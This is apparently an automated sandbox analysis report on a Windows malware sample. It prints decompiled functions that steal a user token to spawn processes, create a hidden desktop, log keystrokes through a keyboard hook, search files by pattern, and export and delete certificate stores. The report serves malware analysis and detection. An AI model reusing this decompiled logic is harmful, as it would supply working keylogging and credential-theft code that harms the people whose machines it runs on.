    • Opcode ID: 4f2e864fd1f4969bfc1566ea5c67134f78baa96b8f82c3861c43e8f6cabf710d
    • Instruction ID: 9d643f994ddb16f5ff3c933fed75c2ace1783db80c7a6442152f82826a9d48c5
    • Opcode Fuzzy Hash: 4f2e864fd1f4969bfc1566ea5c67134f78baa96b8f82c3861c43e8f6cabf710d
    • Instruction Fuzzy Hash: 98E11371A01218EFCF219FA4ED88AEEBBB9FF48710F15807AF515A2261D7349941CF94
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040BDF2, Relevance: 43.9, APIs: 19, Strings: 6, Instructions: 179libraryloaderprocessCOMMON
    Download Yara Rule
    C-Code - Quality: 68%
    			E0040BDF2(intOrPtr __eax, long _a4, WCHAR* _a8, WCHAR* _a12) {
				void* _v12;
				void* _v16;
				_Unknown_base(*)()* _v20;
				struct _PROCESS_INFORMATION _v36;
				struct _STARTUPINFOW _v112;
				int _t49;
				signed int _t63;
				struct HINSTANCE__* _t74;
				_Unknown_base(*)()* _t77;
				long _t82;
				intOrPtr _t83;
				intOrPtr* _t84;
				intOrPtr* _t85;
				void* _t86;
				void* _t87;
				signed int _t88;
				struct HINSTANCE__* _t89;

				_t82 = 0x44;
				_t83 = __eax;
				_t88 = 0;
				E0040F173( &_v112,  &_v112, 0, _t82);
				_v112.cb = _t82;
				_v112.lpDesktop = _t83;
				if(_a4 == 0 || ( *0x416cd0 & 0x00000001) != 0 || _t83 == 0 && E0040BFE7() == 0) {
					L27:
					_t49 = CreateProcessW(_a8, _a12, 0, 0, 0, 0, 0, 0,  &_v112,  &_v36);
					if(_t49 == 0) {
						return _t49;
					}
					goto L28;
				} else {
					_v16 = 0;
					_t84 = GetProcAddress( *0x416e28, "WTSGetActiveConsoleSessionId");
					if(_t84 == 0) {
						L11:
						_a4 = 0;
						if(GetWindowThreadProcessId(GetForegroundWindow(),  &_a4) > 0) {
							_t86 = OpenProcess(0x400, 0, _a4);
							if(_t86 != 0) {
								if(OpenProcessToken(_t86, 0xb,  &_v16) != 0) {
									_t88 = 1;
								}
								CloseHandle(_t86);
							}
						}
						if(_t88 != 1) {
							goto L27;
						} else {
							L17:
							_v12 = 0;
							if(DuplicateTokenEx(_v16, 0x2000000, 0, 1, 1,  &_v12) != 0) {
								_t89 = LoadLibraryA("userenv.dll");
								_v20 = 0;
								_a4 = 0;
								if(_t89 != 0) {
									_t85 = GetProcAddress(_t89, "CreateEnvironmentBlock");
									_v20 = GetProcAddress(_t89, "DestroyEnvironmentBlock");
									if(_t85 != 0) {
										_push(0);
										_push(_v12);
										_push( &_a4);
										if( *_t85() == 0) {
											_a4 = 0;
										}
									}
								}
								_t63 = CreateProcessAsUserW(_v12, _a8, _a12, 0, 0, 0, 0x400, _a4, 0,  &_v112,  &_v36);
								asm("sbb esi, esi");
								_t88 =  ~( ~_t63);
								if(_v20 != 0 && _a4 != 0) {
									_v20(_a4);
								}
								CloseHandle(_v12);
							}
							CloseHandle(_v16);
							if(_t88 == 1) {
								L28:
								CloseHandle(_v36);
								CloseHandle(_v36.hThread);
								return _v36.dwProcessId;
							} else {
								goto L27;
							}
						}
					}
					_t74 = LoadLibraryA("wtsapi32.dll");
					_a4 = _t74;
					if(_t74 != 0) {
						_t87 =  *_t84();
						if(_t87 != 0xffffffff) {
							_t77 = GetProcAddress(_a4, "WTSQueryUserToken");
							if(_t77 != 0) {
								_push( &_v16);
								_push(_t87);
								if( *_t77() != 0) {
									_t88 = 1;
								}
							}
						}
						FreeLibrary(_a4);
						if(_t88 == 1) {
							goto L17;
						}
					}
					goto L11;
				}
			}




















    0x0040bdfd
    0x0040bdff
    0x0040be08
    0x0040be0a
    0x0040be0f
    0x0040be12
    0x0040be18
    0x0040bfad
    0x0040bfc1
    0x0040bfc9
    0x0040bfe4
    0x0040bfe4
    0x00000000
    0x0040be3c
    0x0040be47
    0x0040be50
    0x0040be54
    0x0040be9f
    0x0040bea3
    0x0040beb5
    0x0040bec6
    0x0040beca
    0x0040bedb
    0x0040bedf
    0x0040bedf
    0x0040bee1
    0x0040bee1
    0x0040beca
    0x0040beea
    0x00000000
    0x0040bef0
    0x0040bef0
    0x0040bf01
    0x0040bf0c
    0x0040bf1d
    0x0040bf1f
    0x0040bf22
    0x0040bf27
    0x0040bf3b
    0x0040bf43
    0x0040bf48
    0x0040bf4a
    0x0040bf4b
    0x0040bf51
    0x0040bf56
    0x0040bf58
    0x0040bf58
    0x0040bf56
    0x0040bf48
    0x0040bf78
    0x0040bf82
    0x0040bf84
    0x0040bf89
    0x0040bf93
    0x0040bf93
    0x0040bf99
    0x0040bf99
    0x0040bfa2
    0x0040bfab
    0x0040bfcb
    0x0040bfce
    0x0040bfd7
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040bfab
    0x0040beea
    0x0040be5b
    0x0040be61
    0x0040be66
    0x0040be6a
    0x0040be6f
    0x0040be79
    0x0040be81
    0x0040be86
    0x0040be87
    0x0040be8c
    0x0040be90
    0x0040be90
    0x0040be8c
    0x0040be81
    0x0040be94
    0x0040be9d
    0x00000000
    0x00000000
    0x0040be9d
    0x00000000
    0x0040be66

    APIs
    • GetProcAddress.KERNEL32(WTSGetActiveConsoleSessionId,00000000), ref: 0040BE4A
    • LoadLibraryA.KERNEL32(wtsapi32.dll), ref: 0040BE5B
    • GetProcAddress.KERNEL32(?,WTSQueryUserToken), ref: 0040BE79
    • FreeLibrary.KERNEL32(?), ref: 0040BE94
    • GetForegroundWindow.USER32(?), ref: 0040BEA6
    • GetWindowThreadProcessId.USER32(00000000), ref: 0040BEAD
    • OpenProcess.KERNEL32(00000400,00000000,?), ref: 0040BEC0
    • OpenProcessToken.ADVAPI32(00000000,0000000B,?), ref: 0040BED3
    • CloseHandle.KERNEL32(00000000), ref: 0040BEE1
    • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?), ref: 0040BF04
    • LoadLibraryA.KERNEL32(userenv.dll), ref: 0040BF17
    • GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock), ref: 0040BF2F
    • GetProcAddress.KERNEL32(00000000,DestroyEnvironmentBlock), ref: 0040BF3D
      • Part of subcall function 0040BFE7: OpenWindowStationA.USER32(025DFAF9,00000000,10000000), ref: 0040BFFB
      • Part of subcall function 0040BFE7: SetProcessWindowStation.USER32(00000000), ref: 0040C008
      • Part of subcall function 0040BFE7: OpenDesktopA.USER32(025DFC59,00000000,00000000,10000000), ref: 0040C01D
      • Part of subcall function 0040BFE7: SetThreadDesktop.USER32(00000000), ref: 0040C02A
      • Part of subcall function 0040BFE7: CloseDesktop.USER32(00000000), ref: 0040C033
      • Part of subcall function 0040BFE7: CloseWindowStation.USER32(00000000), ref: 0040C03A
    • CreateProcessAsUserW.ADVAPI32(?,?,?,00000000,00000000,00000000,00000400,?,00000000,?,?), ref: 0040BF78
    • CloseHandle.KERNEL32(?), ref: 0040BF99
    • CloseHandle.KERNEL32(?), ref: 0040BFA2
    • CreateProcessW.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000006,00000000,00000000,00000044,?,?,00000000), ref: 0040BFC1
    • CloseHandle.KERNEL32(?), ref: 0040BFCE
    • CloseHandle.KERNEL32(?), ref: 0040BFD7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Close$Process$HandleWindow$AddressOpenProc$DesktopLibraryStation$CreateLoadThreadToken$DuplicateForegroundFreeUser
    • String ID: CreateEnvironmentBlock$DestroyEnvironmentBlock$WTSGetActiveConsoleSessionId$WTSQueryUserToken$userenv.dll$wtsapi32.dll
    • API String ID: 1454815141-2217652461
    • Opcode ID: e8350258327b90590cf246ec32d3886d1ef024e4475a38c3d5f33f3f1699862c
    • Instruction ID: 10034c37e12677490a1cc527560bbd889662f4706a6bac6e03ae484b67c5473a
    • Opcode Fuzzy Hash: e8350258327b90590cf246ec32d3886d1ef024e4475a38c3d5f33f3f1699862c
    • Instruction Fuzzy Hash: BF514C76900219BFDB119FA0CC88AEF7B79EB04341F06813AFA15F62A0D7758D418B9C
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00404AB1, Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 153filesynchronizationCOMMON
    Download Yara Rule
    C-Code - Quality: 85%
    			E00404AB1(WCHAR* __ecx, intOrPtr __edx) {
				char _v8;
				void* _v12;
				char _v16;
				intOrPtr _v20;
				WCHAR* _v24;
				WCHAR* _v572;
				WCHAR* _v574;
				struct _WIN32_FIND_DATAW _v620;
				short _v622;
				short _v1140;
				short _v1660;
				void* _t57;
				int _t63;
				long _t67;
				intOrPtr _t69;
				WCHAR** _t70;
				int _t72;
				intOrPtr _t79;
				intOrPtr _t82;
				WCHAR* _t87;
				long _t89;
				intOrPtr _t93;
				signed int _t99;
				intOrPtr _t100;
				char _t101;
				void* _t102;

				_t98 = __edx;
				_t97 = __ecx;
				_v20 = __edx;
				_v24 = __ecx;
				PathCombineW( &_v1140, __ecx, "*");
				_v622 = 0;
				_t57 = FindFirstFileW( &_v1140,  &_v620);
				_v12 = _t57;
				if(_t57 != 0xffffffff) {
					__eflags = 0;
					do {
						__eflags = _v620.cFileName - 0x2e;
						if(_v620.cFileName != 0x2e) {
							L7:
							__eflags = _v620.dwFileAttributes & 0x00000010;
							if((_v620.dwFileAttributes & 0x00000010) == 0) {
								 *0x416fe8(0x416758);
								_t99 = 0;
								__eflags =  *0x416770; // 0x0
								if(__eflags <= 0) {
									L21:
									 *0x416fec(0x416758);
									Sleep(0x14);
									L22:
									__eflags =  *0x416770; // 0x0
									if(__eflags <= 0) {
										break;
									}
									goto L23;
								} else {
									goto L11;
								}
								do {
									L11:
									_t69 =  *0x416774; // 0x0
									_t70 = _t69 + _t99 * 4;
									__eflags =  *_t70;
									if( *_t70 == 0) {
										goto L16;
									}
									__eflags = _v620.nFileSizeHigh;
									if(_v620.nFileSizeHigh != 0) {
										goto L16;
									}
									_t72 = PathMatchSpecW( &(_v620.cFileName),  *_t70);
									__eflags = _t72;
									if(_t72 == 0) {
										goto L16;
									}
									PathCombineW( &_v1140, _v24,  &(_v620.cFileName));
									_t101 = _v620.nFileSizeLow;
									_t79 =  *0x416c34; // 0x25df5a8
									_t32 = _t79 + 0x16c; // 0x25642f0
									_v8 = 4;
									_v16 = 0;
									__eflags = E00408088(0x80000001,  *_t32,  &_v1140, 0,  &_v16,  &_v8);
									if(__eflags == 0) {
										L18:
										_t82 =  *0x416c34; // 0x25df5a8
										_t38 = _t82 + 0x170; // 0x25642a0
										wnsprintfW( &_v1660, 0x103,  *_t38, _v620.nFileSizeLow,  &(_v620.cFileName));
										_t102 = _t102 + 0x14;
										_t87 = E0041547E(_t97, _t98, __eflags,  &_v1140, 0,  &_v1660);
										__eflags = _t87;
										if(_t87 != 0) {
											_v8 = _v620.nFileSizeLow;
											_t93 =  *0x416c34; // 0x25df5a8
											_t46 = _t93 + 0x16c; // 0x25642f0
											E004080D1(0x80000001,  *_t46,  &_v1140, 4,  &_v8, 4);
										}
										_t89 = WaitForSingleObject( *(_v20 + 4), 0x2710);
										__eflags = _t89;
										if(_t89 == 0) {
											goto L24;
										} else {
											goto L21;
										}
									}
									__eflags = _t101 - _v16;
									if(__eflags != 0) {
										goto L18;
									}
									L16:
									_t99 = _t99 + 1;
									__eflags = _t99 -  *0x416770; // 0x0
								} while (__eflags < 0);
								goto L21;
							}
							PathCombineW( &_v1140, _v24,  &(_v620.cFileName));
							_t100 = _v20;
							_t67 = WaitForSingleObject( *(_t100 + 4), 0x3e8);
							__eflags = _t67;
							if(_t67 == 0) {
								break;
							}
							_t98 = _t100;
							_t97 =  &_v1140;
							E00404AB1( &_v1140, _t100);
							goto L22;
						}
						__eflags = _v574;
						if(_v574 == 0) {
							goto L22;
						}
						__eflags = _v574 - 0x2e;
						if(_v574 != 0x2e) {
							goto L7;
						}
						__eflags = _v572;
						if(_v572 == 0) {
							goto L22;
						}
						goto L7;
						L23:
						_t63 = FindNextFileW(_v12,  &_v620);
						__eflags = _t63;
					} while (_t63 != 0);
					L24:
					FindClose(_v12);
					return 1;
				}
				return 0;
			}





























    0x00404ab1
    0x00404ab1
    0x00404aca
    0x00404acd
    0x00404ad0
    0x00404ad8
    0x00404aed
    0x00404af3
    0x00404af9
    0x00404b02
    0x00404b04
    0x00404b04
    0x00404b0c
    0x00404b32
    0x00404b32
    0x00404b39
    0x00404b82
    0x00404b88
    0x00404b8a
    0x00404b90
    0x00404cab
    0x00404cb0
    0x00404cb8
    0x00404cbe
    0x00404cbe
    0x00404cc4
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00404b96
    0x00404b96
    0x00404b96
    0x00404b9b
    0x00404b9e
    0x00404ba0
    0x00000000
    0x00000000
    0x00404ba2
    0x00404ba8
    0x00000000
    0x00000000
    0x00404bb3
    0x00404bb9
    0x00404bbb
    0x00000000
    0x00000000
    0x00404bce
    0x00404bd4
    0x00404bea
    0x00404bef
    0x00404bf5
    0x00404c01
    0x00404c09
    0x00404c0b
    0x00404c24
    0x00404c31
    0x00404c36
    0x00404c48
    0x00404c4e
    0x00404c60
    0x00404c65
    0x00404c67
    0x00404c71
    0x00404c81
    0x00404c86
    0x00404c91
    0x00404c91
    0x00404ca1
    0x00404ca7
    0x00404ca9
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00404ca9
    0x00404c0d
    0x00404c10
    0x00000000
    0x00000000
    0x00404c12
    0x00404c12
    0x00404c13
    0x00404c13
    0x00000000
    0x00404c1f
    0x00404b4c
    0x00404b52
    0x00404b5d
    0x00404b63
    0x00404b65
    0x00000000
    0x00000000
    0x00404b6b
    0x00404b6d
    0x00404b73
    0x00000000
    0x00404b73
    0x00404b0e
    0x00404b15
    0x00000000
    0x00000000
    0x00404b1b
    0x00404b23
    0x00000000
    0x00000000
    0x00404b25
    0x00404b2c
    0x00000000
    0x00000000
    0x00000000
    0x00404cc6
    0x00404cd0
    0x00404cd6
    0x00404cd6
    0x00404cde
    0x00404ce1
    0x00000000
    0x00404ce7
    0x00000000

    APIs
    • PathCombineW.SHLWAPI(?,?,00401058), ref: 00404AD0
    • FindFirstFileW.KERNEL32(?,?,?,00401058), ref: 00404AED
    • PathCombineW.SHLWAPI(?,?,0000002E,?,00401058), ref: 00404B4C
    • WaitForSingleObject.KERNEL32(?,000003E8,?,00401058), ref: 00404B5D
    • FindNextFileW.KERNEL32(?,00000010,?,00401058), ref: 00404CD0
    • FindClose.KERNEL32(?,?,00401058), ref: 00404CE1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Find$CombineFilePath$CloseFirstNextObjectSingleWait
    • String ID: .$.
    • API String ID: 3352328711-3769392785
    • Opcode ID: f0fb2e9946f374d9c4e502f8f79d40438c2b7deff6db05dfbaf0ab1d717ee486
    • Instruction ID: 5a58263af4c99b7f8740b288311b6de61e28b98ab436e4f764653bde3f56e9fc
    • Opcode Fuzzy Hash: f0fb2e9946f374d9c4e502f8f79d40438c2b7deff6db05dfbaf0ab1d717ee486
    • Instruction Fuzzy Hash: B7513CB1905118EFDF20DFA0DD48AEA77B8FB44304F0680B6A709B21A0D7359E85DF58
    Uniqueness

    Uniqueness Score: -1.00%

    Function 00414119, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 80threadCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E00414119(void* __ecx) {
				struct HWINSTA__* _v4;
				struct HWINSTA__* _v8;
				char _v9;
				struct HWINSTA__* _t13;
				int _t24;
				struct HWINSTA__* _t26;
				void* _t28;
				WCHAR* _t29;
				struct HDESK__* _t30;
				WCHAR* _t33;

				_t28 = __ecx;
				_t29 = L"Winsta0";
				_v9 = 0;
				_t13 = OpenWindowStationW(_t29, 0, 0x10000000);
				_v8 = _t13;
				if(_t13 != 0) {
					L2:
					_v4 = GetProcessWindowStation();
					if(E004140EE(_t36, _v8) == 0) {
						L12:
						CloseWindowStation(_v8);
						L13:
						return _v9;
					}
					_t33 = L"SubCallssEdit7792";
					_t30 = OpenDesktopW(_t33, 0, 0, 0x10000000);
					if(_t30 != 0) {
						L5:
						if(E004140A9(_t28, _t39, GetThreadDesktop(GetCurrentThreadId()), _t30) != 0) {
							L7:
							_v9 = 1;
							L8:
							CloseDesktop(_t30);
							if(_v9 != 0) {
								L11:
								goto L12;
							}
							L9:
							_t43 = _v4;
							if(_v4 != 0) {
								E004140EE(_t43, _v4);
							}
							goto L11;
						}
						_t24 = SetThreadDesktop(_t30);
						_v9 = 0;
						if(_t24 == 0) {
							goto L8;
						}
						goto L7;
					}
					_t30 = CreateDesktopW(_t33, 0, 0, 0, 0x10000000, 0);
					_t39 = _t30;
					if(_t30 == 0) {
						goto L9;
					}
					goto L5;
				}
				_t26 = CreateWindowStationW(_t29, 0, 0x10000000, 0);
				_v8 = _t26;
				_t36 = _t26;
				if(_t26 == 0) {
					goto L13;
				}
				goto L2;
			}













    0x00414119
    0x00414128
    0x0041412e
    0x00414132
    0x00414138
    0x0041413e
    0x00414156
    0x00414160
    0x0041416b
    0x004141de
    0x004141e2
    0x004141e8
    0x004141f2
    0x004141f2
    0x00414171
    0x0041417d
    0x00414181
    0x00414195
    0x004141ab
    0x004141bc
    0x004141bc
    0x004141c1
    0x004141c2
    0x004141cc
    0x004141dd
    0x00000000
    0x004141dd
    0x004141ce
    0x004141ce
    0x004141d2
    0x004141d8
    0x004141d8
    0x00000000
    0x004141d2
    0x004141ae
    0x004141b4
    0x004141ba
    0x00000000
    0x00000000
    0x00000000
    0x004141ba
    0x0041418f
    0x00414191
    0x00414193
    0x00000000
    0x00000000
    0x00000000
    0x00414193
    0x00414144
    0x0041414a
    0x0041414e
    0x00414150
    0x00000000
    0x00000000
    0x00000000

    APIs
    • OpenWindowStationW.USER32(Winsta0,00000000,10000000), ref: 00414132
    • CreateWindowStationW.USER32(Winsta0,00000000,10000000,00000000), ref: 00414144
    • GetProcessWindowStation.USER32 ref: 00414156
    • OpenDesktopW.USER32(SubCallssEdit7792,00000000,00000000,10000000), ref: 00414177
    • CreateDesktopW.USER32(SubCallssEdit7792,00000000,00000000,00000000,10000000,00000000), ref: 00414189
    • GetCurrentThreadId.KERNEL32 ref: 00414195
    • GetThreadDesktop.USER32(00000000,?,?), ref: 0041419C
    • SetThreadDesktop.USER32(00000000,00000000,00000000,?,?), ref: 004141AE
    • CloseDesktop.USER32(00000000,00000000,00000000,?,?), ref: 004141C2
    • CloseWindowStation.USER32(?,?), ref: 004141E2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Desktop$StationWindow$Thread$CloseCreateOpen$CurrentProcess
    • String ID: SubCallssEdit7792$Winsta0
    • API String ID: 2917431391-621385978
    • Opcode ID: eada033a65eeb81be7a4a19a39a3bc5a04379480b90f90b648bdd5b11bf0ca9f
    • Instruction ID: 4c7fca7ea3063e772fec9fcd2628e766ecc841b5ad94ddd77b17109714ed9629
    • Opcode Fuzzy Hash: eada033a65eeb81be7a4a19a39a3bc5a04379480b90f90b648bdd5b11bf0ca9f
    • Instruction Fuzzy Hash: 6B21B0B5008365BFD710AF61AC8C9EB7FACEAD5394F05483EF945D2211D7298CC8C66A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004060AA, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 109keyboardCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E004060AA(void* __edx, int _a4) {
				char _v520;
				short _v524;
				char _v780;
				short _v782;
				short _v784;
				char _v785;
				void* __edi;
				void* __esi;
				int _t23;
				intOrPtr _t35;
				long _t39;
				intOrPtr _t40;
				void* _t50;
				void* _t51;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t67;

				_t51 = __edx;
				_t23 = _a4;
				if(_t23 == 0) {
					L15:
					return _t23;
				}
				_t23 =  *(_t23 + 4);
				if(_t23 != 0x201) {
					if(_t23 != 0x100) {
						goto L15;
					}
					_t23 = GetKeyState(0x11);
					if((0x80000000 & _t23) != 0) {
						goto L15;
					}
					_t23 = GetKeyState(0x12);
					if((0x80000000 & _t23) != 0) {
						goto L15;
					}
					L10:
					_v782 = 0;
					_t23 = GetKeyboardState( &_v780);
					if(_t23 != 0) {
						_t23 = ToUnicode( *(_a4 + 8), 0,  &_v780,  &_v784, 1, 0);
						if(_t23 == 1) {
							_v785 = 0;
							_t23 = WideCharToMultiByte(0, 0,  &_v784, 1,  &_v785, 1, 0, 0);
							if(_t23 != 0 && _v785 != 0) {
								_t23 = E00405E57(_t50, 1,  &_v785);
							}
						}
					}
					goto L15;
				}
				_t67 =  *0x4167bc; // 0x0
				if(_t67 == 0) {
					goto L15;
				} else {
					 *0x4167bc =  *0x4167bc + 0xffff;
					_t35 =  *0x416c34; // 0x25df5a8
					_t3 = _t35 + 0x70; // 0x25dfc30
					_t60 = E0040970D( *_t3, 0x1e, 0x1f4);
					if(_t60 != 0) {
						_t39 = GetCurrentProcessId();
						_t40 =  *0x416c34; // 0x25df5a8
						_t4 = _t40 + 0x74; // 0x25dfc80
						wnsprintfW( &_v524, 0x103,  *_t4, _t56, _t39);
						E004153A7(_t51, _t60,  &_v520);
						 *((intOrPtr*)( *_t60 + 8))(_t60, GetTickCount());
					}
					goto L10;
				}
			}




















    0x004060aa
    0x004060b0
    0x004060c0
    0x004061e7
    0x004061ed
    0x004061ed
    0x004060c6
    0x004060ce
    0x0040615e
    0x00000000
    0x00000000
    0x0040616c
    0x00406174
    0x00000000
    0x00000000
    0x0040617e
    0x00406181
    0x00000000
    0x00000000
    0x00406183
    0x00406185
    0x0040618f
    0x00406197
    0x004061af
    0x004061b7
    0x004061c9
    0x004061cd
    0x004061d5
    0x004061e2
    0x004061e2
    0x004061d5
    0x004061b7
    0x00000000
    0x00406197
    0x004060d4
    0x004060db
    0x00000000
    0x004060e1
    0x004060e6
    0x004060ed
    0x004060f9
    0x00406101
    0x00406105
    0x0040611e
    0x00406125
    0x0040612b
    0x0040613b
    0x0040614c
    0x00406154
    0x00406154
    0x00000000
    0x00406105

    APIs
    • GetTickCount.KERNEL32 ref: 00406117
    • GetCurrentProcessId.KERNEL32(00000000), ref: 0040611E
    • wnsprintfW.SHLWAPI ref: 0040613B
    • GetKeyState.USER32(00000011), ref: 00406166
    • GetKeyState.USER32(00000012), ref: 00406178
    • GetKeyboardState.USER32(?), ref: 0040618F
    • ToUnicode.USER32(?,00000000,?,?,00000001,00000000), ref: 004061AF
    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,?,00000001,00000000,00000000), ref: 004061CD
      • Part of subcall function 0040970D: LoadLibraryA.KERNELBASE(025DFCC1), ref: 00409724
      • Part of subcall function 0040970D: GetProcAddress.KERNELBASE(00000000,025DFD29), ref: 00409738
      • Part of subcall function 0040970D: GetProcAddress.KERNELBASE(00000000,025DFD49), ref: 0040974D
      • Part of subcall function 0040970D: GetProcAddress.KERNELBASE(00000000,025DFD69), ref: 00409762
      • Part of subcall function 0040970D: GetProcAddress.KERNELBASE(00000000,025DFD99), ref: 00409777
      • Part of subcall function 0040970D: GetProcAddress.KERNELBASE(00000000,025DFDB9), ref: 0040978C
      • Part of subcall function 0040970D: GetProcAddress.KERNELBASE(00000000,025DFDE1), ref: 004097A1
      • Part of subcall function 0040970D: GetProcAddress.KERNELBASE(00000000,025DFE09), ref: 004097B6
      • Part of subcall function 0040970D: LoadLibraryA.KERNELBASE(025DFCE1), ref: 00409812
      • Part of subcall function 0040970D: GetProcAddress.KERNELBASE(00000000,025DFE31), ref: 00409826
      • Part of subcall function 0040970D: LoadLibraryA.KERNELBASE(025DFCF9), ref: 0040984A
      • Part of subcall function 0040970D: GetProcAddress.KERNELBASE(00000000,025DFE59), ref: 0040985E
      • Part of subcall function 0040970D: GetProcAddress.KERNELBASE(00000000,025DFE71), ref: 00409872
      • Part of subcall function 0040970D: GetProcAddress.KERNELBASE(00000000,025DFE91), ref: 00409887
      • Part of subcall function 0040970D: GetProcAddress.KERNELBASE(00000000,025DFEB1), ref: 0040989C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: AddressProc$LibraryLoadState$ByteCharCountCurrentKeyboardMultiProcessTickUnicodeWidewnsprintf
    • String ID: unknown
    • API String ID: 1117135736-2904991687
    • Opcode ID: 943b02debf0b438876f0d9b73d99ab2c84af05d422f59886fe2bf6da88f84d70
    • Instruction ID: a70076e158f80f632a33c0edab9cf678fa5ba9942d495cf88427a9bce3a66e24
    • Opcode Fuzzy Hash: 943b02debf0b438876f0d9b73d99ab2c84af05d422f59886fe2bf6da88f84d70
    • Instruction Fuzzy Hash: 2D31C0B6504204AFD720DBA4DC88EDB76ECEB44344F06843AF945EB1D1DA34DD54CB69
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0040C174, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75fileCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E0040C174(WCHAR* __ecx, intOrPtr __edx) {
				short _v524;
				short _v532;
				char _v540;
				short _v1076;
				short _v1078;
				struct _WIN32_FIND_DATAW _v1124;
				struct _WIN32_FIND_DATAW _v1132;
				intOrPtr _v1136;
				intOrPtr _v1140;
				void* _t29;
				signed char _t46;
				void* _t52;
				WCHAR* _t55;

				_t55 = __ecx;
				_v1132.ftLastAccessTime = __edx;
				PathCombineW( &_v524, __ecx, "*");
				_t29 = FindFirstFileW( &_v532,  &_v1124);
				_v1132.dwFileAttributes = _v1132.dwFileAttributes & 0x00000000;
				_t52 = _t29;
				if(_t52 == 0xffffffff) {
					L13:
					return _v1132.dwFileAttributes;
				} else {
					goto L1;
				}
				L11:
				if(FindNextFileW(_t52,  &_v1132) != 0) {
					L1:
					if(_v1124.cFileName != 0x2e || _v1078 != 0 && (_v1078 != 0x2e || _v1076 != 0)) {
						_t46 = _v1124.dwFileAttributes >> 0x00000004 & 0x00000001;
						if(_t46 != 0 || PathMatchSpecW( &(_v1124.cFileName), _v1132.ftCreationTime) != 0) {
							PathCombineW( &_v532, _t55,  &(_v1124.cFileName));
							if(_t46 == 0) {
								if(E0040FFBF( &_v540) != 0) {
									_v1140 = _v1140 + 1;
								}
							} else {
								_v1140 = _v1140 + E0040C174( &_v540, _v1136);
							}
						}
					}
					goto L11;
				} else {
					FindClose(_t52);
					goto L13;
				}
			}
















    0x0040c188
    0x0040c193
    0x0040c197
    0x0040c1aa
    0x0040c1b0
    0x0040c1b5
    0x0040c1ba
    0x0040c25d
    0x0040c267
    0x00000000
    0x00000000
    0x00000000
    0x0040c242
    0x0040c250
    0x0040c1c0
    0x0040c1c6
    0x0040c1e7
    0x0040c1ea
    0x0040c20d
    0x0040c215
    0x0040c23c
    0x0040c23e
    0x0040c23e
    0x0040c217
    0x0040c227
    0x0040c227
    0x0040c215
    0x0040c1ea
    0x00000000
    0x0040c256
    0x0040c257
    0x00000000
    0x0040c257

    APIs
    • PathCombineW.SHLWAPI(?,?,00401058,00000000,00000000,00000000), ref: 0040C197
    • FindFirstFileW.KERNEL32(?,?), ref: 0040C1AA
    • PathMatchSpecW.SHLWAPI(?,?), ref: 0040C1F5
    • PathCombineW.SHLWAPI(?,?,0000002E), ref: 0040C20D
    • FindNextFileW.KERNEL32(00000000,?,?), ref: 0040C248
    • FindClose.KERNEL32(00000000), ref: 0040C257
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: FindPath$CombineFile$CloseFirstMatchNextSpec
    • String ID: .$.
    • API String ID: 1774936002-3769392785
    • Opcode ID: 17d0d668bd43f15d0942433c1c4f20a7f6459bd4401d4afc836eea5509083f13
    • Instruction ID: c19d3756bbcbc88bfd1e6ba7706cb2c314dc5b7d7743eb1636141c5baddb32bd
    • Opcode Fuzzy Hash: 17d0d668bd43f15d0942433c1c4f20a7f6459bd4401d4afc836eea5509083f13
    • Instruction Fuzzy Hash: 38219E31908345DBC720DBA4D888AAB77F8FB85314F000A3EF58492190E779C949CB5A
    Uniqueness

    Uniqueness Score: -1.00%

    Function 004046EE, Relevance: 13.6, APIs: 9, Instructions: 104encryptiontimeCOMMON
    Download Yara Rule
    APIs
    • CertOpenSystemStoreW.CRYPT32(00000000,?), ref: 00404707
    • PFXExportCertStore.CRYPT32(00000000,025641B0,025641B0,00000004), ref: 00404732
    • PFXExportCertStore.CRYPT32(00000000,025641B0,025641B0,00000004), ref: 00404782
    • GetSystemTime.KERNEL32(?), ref: 00404795
    • wnsprintfW.SHLWAPI ref: 004047C2
    • CertDuplicateCertificateContext.CRYPT32(00000000), ref: 004047F6
    • CertDeleteCRLFromStore.CRYPT32(00000000), ref: 00404801
    • CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 00404809
    • CertCloseStore.CRYPT32(00000000,00000000), ref: 00404820
    Memory Dump Source
    • Source File: 00000000.00000002.463690111.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    Similarity
    • API ID: Cert$Store$ExportSystem$CertificateCertificatesCloseContextDeleteDuplicateEnumFromOpenTimewnsprintf
    • String ID:
    • API String ID: 2462860939-0
    • Opcode ID: 0b38d4166c97423a5f8d304d28608425d6747f86a0d6dcf0ae88f4484c92d8ac
    • Instruction ID: 3bb6bd61e5332bae3517bf3bffe6a22f210b930fe47bed81f05d1308c4b1929b
